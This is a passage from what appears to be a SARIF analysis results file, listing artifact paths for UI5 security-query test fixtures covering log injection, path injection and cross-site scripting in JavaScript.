ws-to-http-log-listener-js-object/ui5.yaml","uriBaseId":"%SRCROOT%","index":319}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":320}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/index.html","uriBaseId":"%SRCROOT%","index":322}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/index.js","uriBaseId":"%SRCROOT%","index":323}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":324}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/package-lock.json","uriBaseId":"%SRCROOT%","index":326}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/package.json","uriBaseId":"%SRCROOT%","index":327}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/ui5.yaml","uriBaseId":"%SRCROOT%","index":328}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/index.html","uriBaseId":"%SRCROOT%","index":329}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":330}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/index.js","uriBaseId":"%SRCROOT%","index":331}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":332}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":333}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":334}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/package-lock.json","uriBaseId":"%SRCROOT%","index":335}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/package.json","uriBaseId":"%SRCROOT%","index":336}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/ui5.yaml","uriBaseId":"%SRCROOT%","index":337}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":338}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/index.html","uriBaseId":"%SRCROOT%","index":339}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/index.js","uriBaseId":"%SRCROOT%","index":340}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":341}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":342}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":343}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json","uriBaseId":"%SRCROOT%","index":344}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json","uriBaseId":"%SRCROOT%","index":345}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml","uriBaseId":"%SRCROOT%","index":346}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html","uriBaseId":"%SRCROOT%","index":348}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":349}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":350}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js","uriBaseId":"%SRCROOT%","index":351}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/package-lock.json","uriBaseId":"%SRCROOT%","index":352}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/package.json","uriBaseId":"%SRCROOT%","index":353}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/ui5.yaml","uriBaseId":"%SRCROOT%","index":354}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/index.html","uriBaseId":"%SRCROOT%","index":356}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/index.js","uriBaseId":"%SRCROOT%","index":357}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":358}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":362}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":363}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":364}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":365}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":366}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":367}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":368}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":369}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":370}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":371}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":372}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":373}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":374}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":375}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":376}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":377}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":378}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":379}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":380}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":381}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":382}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":383}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":384}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":385}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":386}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":387}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":388}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":389}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":390}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":391}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":392}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":393}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":394}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json","uriBaseId":"%SRCROOT%","index":395}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":396}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json","uriBaseId":"%SRCROOT%","index":397}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json","uriBaseId":"%SRCROOT%","index":398}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml","uriBaseId":"%SRCROOT%","index":399}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js","uriBaseId":"%SRCROOT%","index":400}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html","uriBaseId":"%SRCROOT%","index":403}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":404}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json","uriBaseId":"%SRCROOT%","index":405}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js","uriBaseId":"%SRCROOT%","index":406}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js","uriBaseId":"%SRCROOT%","index":407}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js","uriBaseId":"%SRCROOT%","index":408}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js","uriBaseId":"%SRCROOT%","index":409}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js","uriBaseId":"%SRCROOT%","index":410}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html","uriBaseId":"%SRCROOT%","index":411}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js","uriBaseId":"%SRCROOT%","index":412}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js","uriBaseId":"%SRCROOT%","index":413}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html","uriBaseId":"%SRCROOT%","index":414}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js","uriBaseId":"%SRCROOT%","index":415}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js","uriBaseId":"%SRCROOT%","index":416}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js","uriBaseId":"%SRCROOT%","index":417}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html","uriBaseId":"%SRCROOT%","index":418}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js","uriBaseId":"%SRCROOT%","index":419}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js","uriBaseId":"%SRCROOT%","index":420}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml","uriBaseId":"%SRCROOT%","index":421}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json","uriBaseId":"%SRCROOT%","index":422}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml","uriBaseId":"%SRCROOT%","index":423}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":424}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":425}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json","uriBaseId":"%SRCROOT%","index":426}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html","uriBaseId":"%SRCROOT%","index":427}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js","uriBaseId":"%SRCROOT%","index":428}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":429}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":430}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json","uriBaseId":"%SRCROOT%","index":431}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json","uriBaseId":"%SRCROOT%","index":432}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml","uriBaseId":"%SRCROOT%","index":433}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":434}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":435}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html","uriBaseId":"%SRCROOT%","index":436}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js","uriBaseId":"%SRCROOT%","index":437}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":438}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":439}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json","uriBaseId":"%SRCROOT%","index":440}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml","uriBaseId":"%SRCROOT%","index":441}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":442}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json","uriBaseId":"%SRCROOT%","index":443}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":444}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html","uriBaseId":"%SRCROOT%","index":445}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js","uriBaseId":"%SRCROOT%","index":446}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":447}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":448}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":449}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":450}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":451}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":452}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":453}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":454}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":455}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":456}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":457}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":458}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":459}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":460}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":461}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":462}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":463}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":464}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":465}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":466}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json","uriBaseId":"%SRCROOT%","index":467}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json","uriBaseId":"%SRCROOT%","index":468}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml","uriBaseId":"%SRCROOT%","index":469}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html","uriBaseId":"%SRCROOT%","index":470}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js","uriBaseId":"%SRCROOT%","index":472}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":473}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/package-lock.json","uriBaseId":"%SRCROOT%","index":474}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":475}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/package.json","uriBaseId":"%SRCROOT%","index":476}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/ui5.yaml","uriBaseId":"%SRCROOT%","index":477}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/Component.js","uriBaseId":"%SRCROOT%","index":478}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":483}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/index.html","uriBaseId":"%SRCROOT%","index":484}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/index.js","uriBaseId":"%SRCROOT%","index":485}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":486}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App1.view.xml","uriBaseId":"%SRCROOT%","index":487}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App2.view.xml","uriBaseId":"%SRCROOT%","index":488}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App3.view.xml","uriBaseId":"%SRCROOT%","index":489}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App4.view.xml","uriBaseId":"%SRCROOT%","index":490}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":491}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/package.json","uriBaseId":"%SRCROOT%","index":492}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/ui5.yaml","uriBaseId":"%SRCROOT%","index":493}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js","uriBaseId":"%SRCROOT%","index":494}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.html","uriBaseId":"%SRCROOT%","index":495}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.js","uriBaseId":"%SRCROOT%","index":496}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":497}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/view/Main.view.html","uriBaseId":"%SRCROOT%","index":498}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/view/PayloadForm.fragment.xml","uriBaseId":"%SRCROOT%","index":499}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json","uriBaseId":"%SRCROOT%","index":500}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json","uriBaseId":"%SRCROOT%","index":501}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml","uriBaseId":"%SRCROOT%","index":502}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html","uriBaseId":"%SRCROOT%","index":504}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/